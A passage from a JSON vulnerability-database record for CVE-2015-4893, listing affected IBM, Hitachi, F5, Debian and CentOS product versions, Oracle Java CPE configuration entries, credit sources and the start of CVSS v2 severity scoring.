"vendor": "ibm", "version": "11.5" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.3" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.7" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.4.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.3.0" }, { "model": "filenet eprocess", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "filenet content manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "filenet content manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.0" }, { "model": "filenet content manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.0" }, { "model": "filenet business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "filenet business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5.1" }, { "model": "content foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "content foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.0" }, { "model": "content collector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "content collector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "content collector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "content collector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "commonstore for lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "cognos tm1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "cognos tm1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "cognos tm1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.0" }, { "model": "cognos insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "cognos insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "cognos insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "b2b advanced communications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.0.4" }, { "model": "b2b advanced communications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.0.3" }, { "model": "b2b advanced communications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.0.2" }, { "model": "ara", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.0" }, { "model": "ara", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.0" }, { "model": "ara", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.9.1" }, { "model": "api management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "api management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "algo one", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "algo one", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.9" }, { "model": "algo one", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.0" }, { "model": "algo one", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.9.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "ucosminexus service platform messaging )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-09-50" }, { "model": "ucosminexus service platform messaging", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-08-70" }, { "model": "ucosminexus service platform messaging )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-08-20" }, { "model": "ucosminexus service platform messaging (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-08-00" }, { "model": "ucosminexus service platform messaging )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-08-00" }, { "model": "ucosminexus service platform messaging )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-07-10" }, { "model": "ucosminexus service platform messaging", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-07-10" }, { "model": "ucosminexus service platform messaging (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-07-00" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-70" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "ucosminexus service platform (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus service platform (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-70" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "ucosminexus service architect (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus service architect (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus server standard-r", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-70" }, { "model": "ucosminexus server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "ucosminexus server standard-r (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus server standard-r", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus server standard-r (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus primary server base", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-70" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "ucosminexus primary server base (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus primary server base", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus primary server base (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus operator )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus operator", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-70" }, { "model": "ucosminexus operator )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "ucosminexus operator (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus operator )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus operator )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus operator", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus operator (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus developer standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus developer standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus developer standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus developer professional for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus developer professional for plug-in", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-70" }, { "model": "ucosminexus developer professional for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "ucosminexus developer professional for plug-in (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus developer professional for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus developer professional for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus developer professional for plug-in", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus developer professional for plug-in (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus developer professional )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus developer professional )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "ucosminexus developer professional", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus developer professional (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus developer professional )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus developer professional", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus developer professional (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus developer professional )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus developer light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-70" }, { "model": "ucosminexus developer light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "ucosminexus developer light (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus developer light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus developer light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus developer light (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus developer )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0109-50" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0108-70" }, { "model": "ucosminexus developer )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0108-20" }, { "model": "ucosminexus developer (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0108-00" }, { "model": "ucosminexus developer )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0108-00" }, { "model": "ucosminexus developer )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0107-10" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0107-10" }, { "model": "ucosminexus developer (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0107-00" }, { "model": "ucosminexus client for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus client for plug-in", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-70" }, { "model": "ucosminexus client for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "ucosminexus client for plug-in (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus client for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus client for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus client for plug-in", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus client for plug-in (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-70" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "ucosminexus client (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus client (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus application server-r", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-70" }, { "model": "ucosminexus application server-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "ucosminexus application server-r (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus application server-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus application server-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus application server-r", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus application server-r (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-70" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "ucosminexus application server standard-r (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus application server standard-r (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-50" }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "ucosminexus application server standard (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus application server standard (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus application server smart edition", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus application server smart edition", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-70" }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "ucosminexus application server smart edition (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus application server smart edition", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-70" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "ucosminexus application server light (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus application server light (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-70" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-50" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "ucosminexus application server express (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus application server express (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "ucosminexus application server enterprise (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus application server enterprise (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "application server for developers", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "10-10" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "traffix sdc", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.4" }, { "model": "traffix sdc", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.3" }, { "model": "traffix sdc", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.2" }, { "model": "traffix sdc", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.1" }, { "model": "traffix sdc", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.0.5" }, { "model": "traffix sdc", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.0" }, { "model": "traffix sdc", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.5.1" }, { "model": "traffix sdc", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.5" }, { "model": "traffix sdc", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.4.1" }, { "model": "traffix sdc", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.4" }, { "model": "traffix sdc", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.3.2" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "5" }, { "model": "websphere real time sr fp", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3920" }, { "model": "tivoli directory server", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.41" }, { "model": "tivoli directory server", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.2.0.48" }, { "model": "tivoli directory server", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.72" }, { "model": "security network protection", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.1" }, { "model": "security network protection", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.7" }, { "model": "security directory server", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.4.0.6" }, { "model": "security directory server", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.3.1.15" }, { "model": "java sdk sr", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "82" }, { "model": "java sdk 7r1 sr fp", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "320" }, { "model": "java sdk sr fp", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7920" }, { "model": "java sdk 6r1 sr fp", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "815" }, { "model": "java sdk sr fp", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "61615" }, { "model": "java sdk sr fp", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.01614" } ], "sources": [ { "db": "BID", "id": "77207" }, { "db": "JVNDB", "id": "JVNDB-2015-005479" }, { "db": "NVD", "id": "CVE-2015-4893" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.3.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update_85:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.8.0:update_60:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update_101:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.8.0:update_51:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.8.0:update51:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.8.0:update60:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update101:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update85:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2015-4893" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Red Hat", "sources": [ { "db": "PACKETSTORM", "id": "134424" }, { "db": "PACKETSTORM", "id": "137932" }, { "db": "PACKETSTORM", "id": "134501" }, { "db": "PACKETSTORM", "id": "134048" }, { "db": "PACKETSTORM", "id": "134499" } ], "trust": 0.5 }, "cve": "CVE-2015-4893", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 5.0, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2015-4893", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": 